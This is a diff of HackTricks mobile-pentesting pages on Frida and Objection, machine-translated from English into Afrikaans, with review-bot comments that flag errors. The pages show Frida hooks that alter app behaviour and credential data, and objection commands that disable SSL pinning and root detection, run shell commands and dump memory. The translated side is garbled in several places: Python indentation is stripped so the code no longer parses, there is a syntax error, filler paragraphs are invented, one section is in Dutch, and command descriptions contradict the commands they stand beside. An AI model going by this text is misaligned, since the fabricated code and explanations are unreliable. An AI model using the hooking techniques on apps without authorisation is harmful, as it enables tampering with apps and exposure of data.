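Review bot: `**Sommige dele van die oorspronklike kode werk nie en is hier aangepas nie.**` inverts the original ("Some parts of the original code doesn't work and have been modified here"): the sentence-final "nie" closes the negation over "is hier aangepas" as well, so a reader gets "have not been modified here". Write "Sommige dele van die oorspronklike kode werk nie, en is hier aangepas." In the s2.js block, `console.log(tring, and the it has"Found instance: " + instance);` is a JavaScript syntax error carried over unchanged from the `-` side to the `+` side; since the line is being rewritten anyway, make it `console.log("Found instance: " + instance);` so the whole script loads instead of failing at parse time. The inline call `this.fun("hallo daar!")` translates a string literal inside backticks; code is not translated, so keep `this.fun("hey there!")`. Finally, the Part 3 loader.py fragment that starts here loses its function body indentation (`def my_message_handler(message, payload):` followed by `+print message` at column 0), which Python rejects with IndentationError.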
@@ -115,90 +110,86 @@ device.resume(pid) time.sleep(1) # Without it Java.perform silently fails session = device.attach(pid) with open("s3.js") as f: - script = session.create_script(f.read()) +script = session.create_script(f.read()) script.on("message", my_message_handler) script.load() command = "" while 1 == 1: - command = raw_input("Enter command:\n1: Exit\n2: Call secret function\n3: Hook Secret\nchoice:") - if command == "1": - break - elif command == "2": - script.exports.callsecretfunction() - elif command == "3": - script.exports.hooksecretfunction() +command = raw_input("Enter command:\n1: Exit\n2: Call secret function\n3: Hook Secret\nchoice:") +if command == "1": +break +elif command == "2": +script.exports.callsecretfunction() +elif command == "3": +script.exports.hooksecretfunction() ``` +Die bevel "**1**" sal **afsluit**, die bevel "**2**" sal 'n **voorkoms van die klas vind en die private funksie** _**secret()**_ aanroep, en die bevel "**3**" sal die funksie _**secret()**_ **hook** sodat dit 'n **verskillende string** teruggee. -The command "**1**" will **exit**, the command "**2**" will find and **instance of the class and call the private function** _**secret()**_ and command "**3**" will **hook** the function _**secret()**_ so it **return** a **different string**. - -The, if you call "**2**" you will get the **real secret**, but if you call "**3**" and then "**2**" you will get the **fake secret**. +Dus, as jy "**2**" aanroep, sal jy die **werklike geheim** kry, maar as jy "**3**" en dan "**2**" aanroep, sal jy die **vals geheim** kry. 
### JS - ```javascript console.log("Script loaded successfully "); var instances_array = []; function callSecretFun() { - Java.perform(function () { - if (instances_array.length == 0) { // if array is empty - Java.choose("com.example.a11x256.frida_test.my_activity", { - onMatch: function (instance) { - console.log("Found instance: " + instance); - instances_array.push(instance) - console.log("Result of secret func: " + instance.secret()); - }, - onComplete: function () { } +Java.perform(function () { +if (instances_array.length == 0) { // if array is empty +Java.choose("com.example.a11x256.frida_test.my_activity", { +onMatch: function (instance) { +console.log("Found instance: " + instance); +instances_array.push(instance) +console.log("Result of secret func: " + instance.secret()); +}, +onComplete: function () { } - }); - } - else {//else if the array has some values - console.log("Result of secret func: " + instances_array[0].secret()); - } +}); +} +else {//else if the array has some values +console.log("Result of secret func: " + instances_array[0].secret()); +} - }); +}); } function hookSecret() { - Java.perform(function () { - var my_class = Java.use("com.example.a11x256.frida_test.my_activity"); - var string_class = Java.use("java.lang.String"); - my_class.secret.overload().implementation = function(){ - var my_string = string_class.$new("TE ENGANNNNEEE"); - return my_string; - } - }); +Java.perform(function () { +var my_class = Java.use("com.example.a11x256.frida_test.my_activity"); +var string_class = Java.use("java.lang.String"); +my_class.secret.overload().implementation = function(){ +var my_string = string_class.$new("TE ENGANNNNEEE"); +return my_string; +} +}); } rpc.exports = { - callsecretfunction: callSecretFun, - hooksecretfunction: hookSecret +callsecretfunction: callSecretFun, +hooksecretfunction: hookSecret }; ``` +## Deel 4 -## Part 4 - -Here you will see how to make **Python and JS interact** using JSONs objects. 
JS use the `send()` function to send data to the python cliente, and Python uses `post()` functions to send data to ths JS script. The **JS will block the execution** until is receives s response from Python. +Hier sal jy sien hoe om **Python en JS te laat interaksie** deur gebruik te maak van JSON-voorwerpe. JS gebruik die `send()`-funksie om data na die Python-kliënt te stuur, en Python gebruik die `post()`-funksies om data na die JS-skrip te stuur. Die **JS sal die uitvoering blokkeer** totdat dit 'n antwoord van Python ontvang. ### Python - ```python //loader.py import time import frida def my_message_handler(message, payload): - print message - print payload - if message["type"] == "send": - print message["payload"] - data = message["payload"].split(":")[1].strip() - print 'message:', message - data = data.decode("base64") - user, pw = data.split(":") - data = ("admin" + ":" + pw).encode("base64") - print "encoded data:", data - script.post({"my_data": data}) # send JSON object - print "Modified data sent" +print message +print payload +if message["type"] == "send": +print message["payload"] +data = message["payload"].split(":")[1].strip() +print 'message:', message +data = data.decode("base64") +user, pw = data.split(":") +data = ("admin" + ":" + pw).encode("base64") +print "encoded data:", data +script.post({"my_data": data}) # send JSON object +print "Modified data sent" device = frida.get_usb_device() 
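Review bot: every `+` line in the Part 3 and Part 4 Python blocks has lost its leading indentation, so the translated loader.py no longer parses: `+script = session.create_script(f.read())` sits at column 0 under `with open("s3.js") as f:`, the `+break` / `+elif command == "2":` / `+script.exports.callsecretfunction()` lines sit at column 0 under `while 1 == 1:`, and in the Part 4 handler `+print message["payload"]` follows `+if message["type"] == "send":` without indentation. The JS (`s3.js`) block in this hunk is flattened the same way; that is only cosmetic for JavaScript, but the Python is broken. Keep the whitespace of the `-` lines verbatim and translate only the prose around the fences.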
@@ -207,49 +198,54 @@ device.resume(pid) time.sleep(1) session = device.attach(pid) with open("s4.js") as f: - script = session.create_script(f.read()) +script = session.create_script(f.read()) script.on("message", my_message_handler) # register the message handler script.load() raw_input() ``` - ### JS +JavaScript (JS) is 'n programmeertaal wat gebruik word om interaktiewe webblaaie te skep. Dit word ook gebruik om mobiele toepassings, webtoepassings en selfs servers te ontwikkel. JS is 'n kernkomponent van die web en word deur alle moderne webblaaie ondersteun. + +JS kan gebruik word om verskeie funksies uit te voer, soos die manipulasie van HTML-elemente, die hantering van gebeurtenisse, die kommunikasie met 'n bediener en die skep van animasies. Dit is 'n veelsydige taal wat deur ontwikkelaars gebruik word om interaktiewe en dinamiese webblaaie te skep. + +In die konteks van hakwerk kan JS ook gebruik word om sekuriteitslekke in webtoepassings bloot te lê. Deur JS te manipuleer, kan 'n aanvaller toegang verkry tot sensitiewe inligting, soos gebruikersname en wagwoorde, of selfs die uitvoering van skadelike kodes bewerkstellig. + +Dit is belangrik vir hakkers om 'n goeie begrip van JS te hê, aangesien dit 'n kritieke taal is wat dikwels gebruik word in webtoepassings. Deur JS te verstaan en te manipuleer, kan 'n hacker suksesvolle aanvalle uitvoer en sekuriteitslekke uitbuit. 
```javascript console.log("Script loaded successfully "); Java.perform(function () { - var tv_class = Java.use("android.widget.TextView"); - tv_class.setText.overload('java.lang.CharSequence').implementation = function (x) { - var string_to_send = x.toString(); - var string_to_recv = ""; - send(string_to_send); // send data to python code - recv(function (received_json_object) { - string_to_recv = received_json_object.my_data; - }).wait(); //block execution till the message is received - console.log("Final string_to_recv: "+ string_to_recv) - return this.setText(string_to_recv); - } +var tv_class = Java.use("android.widget.TextView"); +tv_class.setText.overload('java.lang.CharSequence').implementation = function (x) { +var string_to_send = x.toString(); +var string_to_recv = ""; +send(string_to_send); // send data to python code +recv(function (received_json_object) { +string_to_recv = received_json_object.my_data; +}).wait(); //block execution till the message is received +console.log("Final string_to_recv: "+ string_to_recv) +return this.setText(string_to_recv); +} }); ``` - -There is a part 5 that I am not going to explain because there isn't anything new. But if you want to read it is here: [https://11x256.github.io/Frida-hooking-android-part-5/](https://11x256.github.io/Frida-hooking-android-part-5/) +Daar is 'n deel 5 wat ek nie gaan verduidelik nie omdat daar niks nuuts is nie. Maar as jy wil lees, is dit hier: [https://11x256.github.io/Frida-hooking-android-part-5/](https://11x256.github.io/Frida-hooking-android-part-5/)
-If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). +As jy belangstel in **hacking loopbaan** en die onhackbare wil hack - **ons is aan die werf!** (_vloeiende Pools skriftelik en mondeling vereis_). {% embed url="https://www.stmcyber.com/careers" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
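Review bot: the four paragraphs inserted under `### JS` in this hunk ("JavaScript (JS) is 'n programmeertaal wat gebruik word om interaktiewe webblaaie te skep..." through "...kan 'n hacker suksesvolle aanvalle uitvoer en sekuriteitslekke uitbuit") have no counterpart in the removed English text; they are generic filler produced by the translation workflow, not a translation, and should be dropped so the heading leads straight into the `s4.js` block as the `-` lines do. The `+` lines of that `s4.js` block are also flattened to column 0 (compare `- var tv_class = Java.use("android.widget.TextView");` with `+var tv_class = ...`), which is the same code-fence mangling seen in the earlier hunks of this file.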
diff --git a/mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.md b/mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.md index 343659db6..6e404e467 100644 --- a/mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.md +++ b/mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.md @@ -1,312 +1,321 @@ -# Objection Tutorial +# Objection Tutoriaal
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PRs in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! +**Bug bounty wenk**: **teken aan** vir **Intigriti**, 'n premium **bug bounty-platform wat deur hackers geskep is, vir hackers**! Sluit vandag by ons aan by [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks), en begin om belonings tot **$100,000** te verdien! {% embed url="https://go.intigriti.com/hacktricks" %} -## **Introduction** +## **Inleiding** **objection - Runtime Mobile Exploration** -**[Objection](https://github.com/sensepost/objection)** is a runtime mobile exploration toolkit, powered by [Frida](https://www.frida.re). It was built with the aim of helping assess mobile applications and their security posture without the need for a jailbroken or rooted mobile device. +**[Objection](https://github.com/sensepost/objection)** is 'n runtime mobiele verkenningstoolkit, aangedryf deur [Frida](https://www.frida.re). Dit is ontwikkel met die doel om te help om mobiele toepassings en hul sekuriteitsposisie te assesseer sonder die nodigheid van 'n jailbroken of rooted mobiele toestel. -**Note:** This is not some form of jailbreak / root bypass. By using `objection`, you are still limited by all of the restrictions imposed by the applicable sandbox you are facing. +**Nota:** Dit is nie 'n vorm van jailbreak / root-omseil nie. Deur `objection` te gebruik, word jy steeds beperk deur al die beperkings wat deur die toepaslike sandboks wat jy in die gesig staar, opgelê word. -### Resume +### Hervat -The **goal** of **objection** is let the user call the **main actions that offers Frida**. **Otherwise**, the user will need to create a **single script for every application** that he wants to test. 
+Die **doel** van **objection** is om die gebruiker die **hoofaksies wat Frida bied**, te laat oproep. **Andersins** sal die gebruiker 'n **enkele skrips vir elke toepassing** wat hy wil toets, moet skep. -## Tutorial +## Tutoriaal -For this tutorial I am going to use the APK that you can download here: +Vir hierdie tutoriaal gaan ek die APK gebruik wat jy hier kan aflaai: {% file src="../../../.gitbook/assets/app-release.zip" %} -Or from its [original repository ](https://github.com/asvid/FridaApp)(download app-release.apk) - -### Installation +Of vanaf sy [oorspronklike bewaarplek](https://github.com/asvid/FridaApp)(laai app-release.apk af) +### Installasie ```bash pip3 install objection ``` +### Verbinding -### Connection - -Make a **regular ADB conection** and **start** the **frida** server in the device (and check that frida is working in both the client and the server). - -If you are using a **rooted device** it is needed to select the application that you want to test inside the _**--gadget**_ option. in this case: +Maak 'n **gewone ADB-verbinding** en **begin** die **frida**-bediener op die toestel (en kontroleer dat frida in beide die kliënt en die bediener werk). +As jy 'n **geroote toestel** gebruik, moet jy die toepassing wat jy wil toets, kies binne die _**--gadget**_ opsie. in hierdie geval: ```bash frida-ps -Uai objection --gadget asvid.github.io.fridaapp explore ``` +### Basiese Aksies -### Basic Actions +Nie alle moontlike bevele van objections sal in hierdie handleiding gelys word nie, slegs diegene wat ek as meer nuttig beskou het. -Not all possible commands of objections are going to be listed in this tutorial, only the ones that I have found more useful. - -#### Environment - -Some interesting information (like passwords or paths) could be find inside the environment. +#### Omgewing +Sommige interessante inligting (soos wagwoorde of paaie) kan binne die omgewing gevind word. 
```bash env ``` - ![](<../../../.gitbook/assets/image (64).png>) -#### Frida Information - +#### Frida Inligting ```bash frida ``` - ![](<../../../.gitbook/assets/image (65).png>) -#### Upload/Download - +#### Oplaai/Aflaai ```bash file download [] file upload [] ``` +#### Voer frida-skrip in -#### Import frida script +```javascript +Java.perform(function() { + // Your code here +}); +``` +#### Hooking a method ```bash import ``` - #### SSLPinning +SSLPinning is 'n tegniek wat gebruik word om die vertroue in die SSL-sertifikate van 'n Android-toepassing te versterk. Dit verhoed dat 'n aanvaller 'n vals sertifikaat gebruik om kommunikasie tussen die toepassing en die bediener te onderskep of te manipuleer. SSLPinning kan gebruik word om die veiligheid van 'n toepassing te verhoog deur die risiko van man-in-die-middel-aanvalle te verminder. + +Objection bied 'n handige funksie aan om SSLPinning te omseil. Dit maak gebruik van die Frida-raamwerk om die SSL-sertifikaatverifikasieproses in die toepassing te onderskep en te manipuleer. Hierdie tegniek maak dit moontlik om 'n vals sertifikaat te gebruik sonder dat die toepassing dit besef. + +Om SSLPinning met Objection te omseil, moet jy die volgende stappe volg: + +1. Installeer Objection en die nodige afhanklikhede. +2. Begin die Frida-server op die doeltoestel. +3. Verbind Objection met die toepassing wat jy wil ondersoek. +4. Gebruik die `sslpinning disable`-bevel om SSLPinning te omseil. + +Met hierdie tegniek kan jy die SSLPinning-meganisme van 'n Android-toepassing omseil en die kommunikasie tussen die toepassing en die bediener onderskep en manipuleer. Dit kan nuttig wees vir pentesters en ontwikkelaars om die veiligheid van hul toepassings te evalueer en te verbeter. ```bash android sslpinning disable #Attempts to disable SSL Pinning on Android devices. ``` +#### Root opsporing -#### Root detection +Root-detectie is een belangrijk aspect van Android-app pentesting. 
Het verwijst naar het proces van het identificeren van of een Android-apparaat is geroot of niet. Een geroot apparaat kan de beveiligingsmaatregelen van een app omzeilen en mogelijk ongeautoriseerde toegang tot gevoelige gegevens mogelijk maken. +Er zijn verschillende technieken die kunnen worden gebruikt om root-detectie uit te voeren, zoals het controleren van de aanwezigheid van bekende root-bestanden, het controleren van de aanwezigheid van root-apps of het controleren van de status van de SELinux-beveiligingsfunctie. + +Het is belangrijk om root-detectie uit te voeren tijdens het pentesten van een Android-app, omdat het helpt bij het identificeren van mogelijke beveiligingslekken en het nemen van de juiste maatregelen om deze te verhelpen. ```bash android root disable #Attempts to disable root detection on Android devices. android root simulate #Attempts to simulate a rooted Android environment. ``` +#### Uitvoeringsopdrag -#### Exec Command +The `exec` command in Objection allows you to execute shell commands on the target Android device. This can be useful for performing various actions during a mobile penetration test. +To use the `exec` command, you need to have a Frida session established with the target application. Once you have the session, you can run shell commands by using the following syntax: + +``` +objection> exec +``` + +Replace `` with the shell command you want to execute. For example, if you want to list the files in the current directory, you can use the `ls` command: + +``` +objection> exec ls +``` + +The output of the command will be displayed in the Objection console. You can use this command to perform tasks such as exploring the file system, checking the device's network configuration, or executing other shell commands to gather information during your mobile penetration test. 
+ +It's important to note that the `exec` command runs the shell command on the target device, so be cautious when executing commands that may have unintended consequences. Always ensure that you have the necessary permissions and authorization to perform the actions you intend to take. ```bash android shell_exec whoami ``` - -#### Screenshots - +#### Skermskote ```bash android ui screenshot /tmp/screenshot android ui FLAG_SECURE false #This may enable you to take screenshots using the hardware keys ``` +### Statische analise gemaak Dinamies -### Static analysis made Dynamic +In 'n werklike toepassing moet ons al die inligting wat in hierdie gedeelte ontdek is, ken voordat ons objection gebruik, dankie aan **statische analise**. In elk geval kan jy dalk **iets nuuts sien** hier, aangesien jy slegs 'n volledige lys van klasse, metodes en uitgevoerde objekte sal hê. -In a real application we should know all of the information discovered in this part before using objection thanks to **static analysis**. Anyway, this way maybe you can see **something new** as here you will only have a complete list of classes, methods and exported objects. - -This is also usefull if somehow you are **unable to get some readable source code** of the app. - -#### List activities, receivers and services +Dit is ook nuttig as jy op een of ander manier **nie toegang tot leesbare bronkode** van die app kan kry nie. 
+#### Lys aktiwiteite, ontvangers en dienste ```bash android hooking list activities ``` - ![](<../../../.gitbook/assets/image (78).png>) - ```bash android hooking list services android hooking list receivers ``` +Frida sal 'n fout lewer as daar geen aktiwiteit gevind word -Frida will launch an error if none is found - -#### Getting current activity - +#### Kry huidige aktiwiteit ```bash android hooking get current_activity ``` +#### Soek Klasses -![](<../../../.gitbook/assets/image (73) (1).png>) - -#### Search Classes - -Lets start looking for classes inside our application - +Laten ons begin om vir klasse binne ons toepassing te soek ```bash android hooking search classes asvid.github.io.fridaapp ``` - ![](<../../../.gitbook/assets/image (69).png>) -#### Search Methods of a class - -Now lets extract the methods inside the class _MainActivity:_ +#### Soekmetodes van 'n klas +Nou laat ons die metodes binne die klas _MainActivity_ onttrek: ```bash android hooking search methods asvid.github.io.fridaapp MainActivity ``` - ![](<../../../.gitbook/assets/image (70) (1).png>) -#### List declared Methods of a class with their parameters - -Lets figure out wich parameters does the methods of the class need: +#### Lys gedeclareerde Metodes van 'n klas met hul parameters +Laten ons uitvind watter parameters die metodes van die klas benodig: ```bash android hooking list class_methods asvid.github.io.fridaapp.MainActivity ``` - ![](<../../../.gitbook/assets/image (79).png>) -#### List classes - -You could also list all the classes that were loaded inside the current applicatoin: +#### Lys klasse +Jy kan ook 'n lys van al die klasse wat gelaai is binne die huidige toepassing lys: ```bash android hooking list classes #List all loaded classes, As the target application gets usedmore, this command will return more classes. ``` +Dit is baie nuttig as jy die metode van 'n klas wil **hook en jy ken net die naam van die klas**. 
Jy kan hierdie funksie gebruik om **te soek watter module die klas besit** en dan sy metode te hook. -This is very useful if you want to **hook the method of a class and you only know the name of the class**. You coul use this function to **search which module owns the class** and then hook its method. +### Hooking is maklik -### Hooking being easy - -#### Hooking (watching) a method - -From the [source code](https://github.com/asvid/FridaApp/blob/master/app/src/main/java/asvid/github/io/fridaapp/MainActivity.kt) of the application we know that the **function** _**sum()**_ **from** _**MainActivity**_ is being run **every second**. Lets try to **dump all possible information** each time the function is called (arguments, return value and backtrace): +#### Hooking (kyk) 'n metode +Vanuit die [bronkode](https://github.com/asvid/FridaApp/blob/master/app/src/main/java/asvid/github/io/fridaapp/MainActivity.kt) van die toepassing weet ons dat die **funksie** _**sum()**_ **vanaf** _**MainActivity**_ elke sekonde uitgevoer word. Laat ons probeer om **alle moontlike inligting** elke keer as die funksie geroep word te dump (argumente, terugkeerwaarde en backtrace): ```bash android hooking watch class_method asvid.github.io.fridaapp.MainActivity.sum --dump-args --dump-backtrace --dump-return ``` - ![](<../../../.gitbook/assets/image (71).png>) -#### Hooking (watching) an entire class - -Actually I find all the methods of the class MainActivity really interesting, lets **hook them all**. Be careful, this could **crash** an application. +#### Hooking (watching) 'n hele klas +Eintlik vind ek al die metodes van die klas MainActivity baie interessant, laat ons **hulle almal hook**. Wees versigtig, dit kan 'n toepassing **crash**. 
```bash android hooking watch class asvid.github.io.fridaapp.MainActivity --dump-args --dump-return ``` - -If you play with the application while the class is hooked you will see when **each function is being called**, its **arguments** and the **return** value. +As jy speel met die aansoek terwyl die klas gehook is, sal jy sien wanneer **elke funksie geroep word**, sy **argumente** en die **terugkeerwaarde**. ![](<../../../.gitbook/assets/image (72).png>) -#### Changing boolean return value of a function +#### Verander die booleaanse terugkeerwaarde van 'n funksie -From the source code you can see that the function _checkPin_ gets a _String_ as argument and returns a _boolean_. Lets make the function **always return true**: +Vanuit die bronkode kan jy sien dat die funksie _checkPin_ 'n _String_ as argument kry en 'n _boolean_ teruggee. Laat ons die funksie **altyd waar** maak: ![](<../../../.gitbook/assets/image (74).png>) -Now, If you write anything in the text box for the PIN code you will see tat anything is valid: +Nou, as jy iets in die teksboks vir die PIN-kode skryf, sal jy sien dat enigiets geldig is: ![](<../../../.gitbook/assets/image (77).png>) -### Class instances - -Search for and print **live instances of a specific Java class**, specified by a fully qualified class name. Out is the result of an attempt at getting a string value for a discovered objection which would typically **contain property values for the object**. +### Klasinstansies +Soek na en druk **lewende instansies van 'n spesifieke Java-klas** af, gespesifiseer deur 'n volledig gekwalifiseerde klasnaam. Out is die resultaat van 'n poging om 'n stringwaarde vir 'n ontdekte beswaar te kry wat tipies **eiendomswaardes vir die objek** sou bevat. 
``` android heap print_instances ``` - ![](<../../../.gitbook/assets/image (80).png>) ### Keystore/Intents -You can play with the keystore and intents using: - +Jy kan speel met die keystore en intents deur gebruik te maak van: ```bash android keystore list android intents launch_activity android intent launch_service ``` +#### Uitleg -### Memory +Die `dump`-bevel word gebruik om die inhoud van die geheue van 'n Android-toepassing te onttrek. Hierdie bevel kan gebruik word om sensitiewe inligting soos wagwoorde, sleutels en ander geheime te onthul. -#### Dump +#### Gebruik +Om die geheue van 'n Android-toepassing te dump, gebruik die volgende bevel: + +```plaintext +dump +``` + +Hier is 'n voorbeeld van hoe om die geheue van 'n toepassing met die klassenaam `com.example.app` te dump: + +```plaintext +dump com.example.app +``` + +Die uitset van die `dump`-bevel sal die inhoud van die geheue van die toepassing wees. Dit kan gebruik word om sensitiewe inligting te ondersoek en te analiseer. ```bash memory dump all #Dump all memory memory dump from_base #Dump a part ``` - -#### List - +#### Lys ```bash memory list modules ``` - ![](<../../../.gitbook/assets/image (66).png>) -At the bottom os the list you can see frida: +Aan die onderkant van die lys kan jy frida sien: ![](<../../../.gitbook/assets/image (67).png>) -Lets checks what is frida exporting: +Laat ons kyk wat frida uitvoer: ![](<../../../.gitbook/assets/image (68).png>) -#### Search/Write - -You can alse search and write inside memory with objection: +#### Soek/Skryf +Jy kan ook soek en skryf binne die geheue met objection: ```bash memory search "" (--string) (--offsets-only) memory write "
" "" (--string) ``` - ### SQLite -You cals can use the command `sqlite` to interact with sqlite databases. - -### Exit +Jy kan die opdrag `sqlite` gebruik om met sqlite databasisse te kommunikeer. +### Uitgang ```bash exit ``` +## Wat ek mis in Objection -## What I miss in Objection - -* The hooking methods sometimes crashes the application (this is also because of Frida). -* You can't use the instaces of the classes to call functions of the instance. And you can't create new instances of classes and use them to call functions. -* There isn't a shortcut (like the one for sslpinnin) to hook all the common crypto methods being used by the application to see cyphered text, plain text, keys, IVs and algorithms used. +* Die hakmetodes laat soms die toepassing afkraak (dit is ook as gevolg van Frida). +* Jy kan nie die instansies van die klasse gebruik om funksies van die instansie te roep nie. En jy kan nie nuwe instansies van klasse skep en dit gebruik om funksies te roep nie. +* Daar is nie 'n kortpad (soos die een vir sslpinnin) om al die algemene kriptografiese metodes wat deur die toepassing gebruik word, te hak om gekripteerde teks, plain teks, sleutels, IV's en gebruikte algoritmes te sien nie. -**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! +**Bug bounty wenk**: **Teken aan** vir **Intigriti**, 'n premium **bug bounty platform wat deur hackers geskep is, vir hackers!** Sluit vandag by ons aan by [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks), en begin om belonings tot **$100,000** te verdien! {% embed url="https://go.intigriti.com/hacktricks" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS hakwerk van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
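Review bot: this hunk adds material that the English original does not contain and that contradicts the commands shown beside it; all of it should be reverted to a plain translation. Under `#### Voer frida-skrip in` a new `javascript` block (`Java.perform(function() { // Your code here });`) and a new `#### Hooking a method` heading appear before the `import` command. Under `#### SSLPinning` five paragraphs and a four-step list are inserted ahead of the single `android sslpinning disable` line. The paragraphs under `#### Root opsporing` ("Root-detectie is een belangrijk aspect van Android-app pentesting. Het verwijst naar het proces van...") are Dutch, not Afrikaans. Under `#### Uitvoeringsopdrag` an English explanation of an `objection> exec ` syntax is added although the command in the block right below is `android shell_exec whoami`. The removed `-### Memory` / `-#### Dump` headings are replaced by `+#### Uitleg` / `+#### Gebruik` text describing a `dump com.example.app` command, which does not match the `memory dump all` / `memory dump from_base` commands that follow, and the Memory section loses its heading as a result. Smaller points: `-### Resume` is rendered `+### Hervat` (to continue) where "Opsomming" (summary) is meant; the image line `-![](<../../../.gitbook/assets/image (73) (1).png>)` after `android hooking get current_activity` is deleted with no replacement; and the blank lines between headings and their code fences are removed throughout, which changes rendering for no reason.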
diff --git a/mobile-pentesting/android-app-pentesting/frida-tutorial/owaspuncrackable-1.md b/mobile-pentesting/android-app-pentesting/frida-tutorial/owaspuncrackable-1.md index 2a136b929..c5cc36658 100644 --- a/mobile-pentesting/android-app-pentesting/frida-tutorial/owaspuncrackable-1.md +++ b/mobile-pentesting/android-app-pentesting/frida-tutorial/owaspuncrackable-1.md @@ -1,151 +1,147 @@ -# Frida Tutorial 3 +# Frida Tutoriaal 3
